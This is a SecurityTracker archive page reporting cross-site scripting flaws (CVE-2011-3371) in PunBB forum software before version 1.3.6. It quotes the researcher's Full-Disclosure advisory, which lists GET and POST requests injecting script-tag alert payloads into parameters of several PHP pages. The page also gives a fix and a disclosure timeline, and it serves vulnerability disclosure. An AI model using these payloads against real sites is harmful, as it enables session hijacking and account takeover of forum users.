SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   PunBB Vendors:   punbb.org
PunBB Input Validation Holes Permit Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1026073
SecurityTracker URL:  http://securitytracker.com/id/1026073
CVE Reference:   CVE-2011-3371   (Links to External Site)
Updated:  Sep 23 2011
Original Entry Date:  Sep 20 2011
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): prior to 1.3.6
Description:   A vulnerability was reported in PunBB. A remote user can conduct cross-site scripting attacks.

Several scripts do not properly filter HTML code from user-supplied input before displaying the input. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the PunBB software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

The 'login.php', 'delete.php', 'edit.php', 'misc.php', 'profile.php', and 'register.php' are affected.

Piotr Duszynski (@drk1wi) reported this vulnerability.

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the PunBB software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Solution:   The vendor has issued a fix (1.3.6).

The vendor's advisory is available at:

http://punbb.informer.com/forums/topic/24430/punbb-136/

Vendor URL:  punbb.informer.com/forums/topic/24430/punbb-136/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [Full-disclosure] PunBB PHP Forum - Multiple XSS

=======================================================================
PunBB PHP Forum - Multiple XSS
=======================================================================

Affected Software : PunBB PHP Forum
Severity          : Medium
Local/Remote      : Remote
Author            : @drk1wi

[Summary]

Just for those whom it might concern.
These vulnerabilities have been identified for the latest (clean 
version 1.3.5) during one of my penetration tests.

[Vulnerability Details]


GET 
/login.php?action=out&id=3&csrf_token=4b072f27396cec5d79"/><script>alert(oink)</script>
GET 
/misc.php?action=markforumread&fid=1&csrf_token=c173cabad786"/><script>alert(oink)</script>

POST /delete.php?id=>"'><script>alert(oink)</script>
form_sent=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_confirm=>"'><script>alert(oink)</script>&delete=>"'><script>alert(oink)</script>

POST /edit.php?id=>"'><script>alert(oink)</script>
form_sent=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_message=>"'><script>alert(oink)</script>&submit=>"'><script>alert(oink)</script>

POST /login.php?action=>"'><script>alert(oink)</script>
form_sent=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_email=>"'><script>alert(oink)</script>&request_pass=>"'><script>alert(oink)</script>

POST /misc.php?email=>"'><script>alert(oink)</script>
form_sent=>"'><script>alert(oink)</script>&redirect_url=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_subject=>"'><script>alert(oink)</script>&req_message=>"'><script>alert(oink)</script>&submit=>"'><script>alert(oink)</script>

POST 
/profile.php?action=>"'><script>alert(oink)</script>&id=>"'><script>alert(oink)</script>
form_sent=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_old_password=>"'><script>alert(oink)</script>&req_new_password1=>"'><script>alert(oink)</script>&req_new_password2=>"'><script>alert(oink)</script>&update=>"'><script>alert(oink)</script>

POST /register.php?action=>"'><script>alert(oink)</script>
form_sent=>"'><script>alert(oink)</script>&csrf_token=>"'><script>alert(oink)</script>&req_username=>"'><script>alert(oink)</script>&req_password1=>"'><script>alert(oink)</script>&req_password2=>"'><script>alert(369448)</script>&req_email1=>"'><script>alert(oink)</script>&timezone=>"'><script>alert(oink)</script>&register=>"'><script>alert(oink)</script>


[Time-line]

20/08/2011 - Vendor notified
02/09/2011 - No e-mail reply and BAN on Forum
???        - Vendor patch release
16/09/2011 - Public disclosure

[Fix Information]


Cheers,
Piotr Duszynski (@drk1wi)
http://sharpsec.net

X. LEGAL NOTICES

Copyright (c) 2011 Piotr "drk1wi" Duszynski

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without mine express
written consent. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please email me for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS 
condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, 
indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, SecurityGlobal.net LLC